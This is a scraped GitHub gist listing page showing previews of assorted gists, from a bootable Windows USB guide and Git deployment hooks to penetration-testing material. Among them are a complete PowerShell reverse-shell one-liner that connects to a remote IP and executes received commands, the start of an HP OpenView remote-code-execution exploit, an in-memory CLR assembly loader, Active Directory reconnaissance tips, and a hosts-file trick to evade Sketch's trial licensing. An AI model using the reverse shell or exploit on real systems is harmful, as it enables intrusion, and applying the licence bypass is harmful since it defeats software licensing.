Skip to content

Instantly share code, notes, and snippets.

View PaulSec's full-sized avatar

Paul PaulSec

1.3k followers · 26 following
View GitHub Profile
@acarril
acarril / bootable-win-on-mac.md
Created November 18, 2022 17:49
Create a bootable Windows USB using macOS

For some reason, it is surprisingly hard to create a bootable Windows USB using macOS. These are my steps for doing so, which have worked for me in macOS Monterey (12.6.1) for Windows 10 and 11. After following these steps, you should have a bootable Windows USB drive.

1. Download a Windows disc image (i.e. ISO file)

You can download Windows 10 or Windows 11 directly from Microsoft.

2. Identify your USB drive

After plugging the drive to your machine, identify the name of the USB device using diskutil list, which should return an output like the one below. In my case, the correct disk name is disk2.

@Arno0x
Arno0x / TestAssembly.cs
Last active February 21, 2025 05:50
This code shows how to load a CLR in an unmanaged process, then load an assembly from memory (not from a file) and execute a method
/*
================================ Compile as a .Net DLL ==============================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs
*/
using System.Windows.Forms;
namespace TestNamespace
@kitallis
kitallis / static-file-server.go
Last active April 16, 2023 03:18
serve static files / directory with http basic auth in Go
/*
Simple static file server with http basic auth in go
Usage:
-p="8100": port to serve on
-d=".": the directory of static files to host
Navigating to http://localhost:8100 will display the index.html or directory
listing file.
*/
@ThunderSon
ThunderSon / powershell_reverse_shell.ps1
Created July 9, 2018 13:57 — forked from egre55/powershell_reverse_shell.ps1
powershell reverse shell one-liner (no attribution)
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active February 27, 2025 20:54
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@mgeeky
mgeeky / hp-openview-exploit.py
Created March 29, 2017 23:55
HP OpenView NNM B.07.50 Remote Code Execution exploit with ASCII encoded egghunter, JO/JNO jump-over-SEH trick and stack aligned. Written during OSCE/CTP course.
#!/usr/bin/python
# HP OpenView NNM B.07.50 Remote Code Execution exploit
# by Mariusz B. / mgeeky, 17'
import struct
import socket
HOST = '192.168.XXX.YYY'
PORT = 7510
@mgeeky
mgeeky / msfvenom-reverse-tcp-WaitForSingleObject.md
Last active January 16, 2025 19:33
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.

Looking for WaitForSingleObject call within modern msfvenom generated payload.

Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.

Contents:

@mubix
mubix / infosec_newbie.md
Last active February 12, 2025 19:45
How to start in Infosec
@Bhavdip
Bhavdip / sketch-never-ending.md
Created October 6, 2016 15:53
Modify Sketch to never ending trial

###Sketch trial non stop

Open hosts files:

$ open /private/etc/hosts

Edit the file adding:

127.0.0.1 backend.bohemiancoding.com

127.0.0.1 bohemiancoding.sketch.analytics.s3-website-us-east-1.amazonaws.com

@noelboss
noelboss / git-deployment.md
Last active January 26, 2025 02:58
Simple automated GIT Deployment using Hooks

Simple automated GIT Deployment using GIT Hooks

Here are the simple steps needed to create a deployment from your local GIT repository to a server based on this in-depth tutorial.

How it works

You are developing in a working-copy on your local machine, lets say on the master branch. Most of the time, people would push code to a remote server like github.com or gitlab.com and pull or export it to a production server. Or you use a service like deepl.io to act upon a Web-Hook that's triggered that service.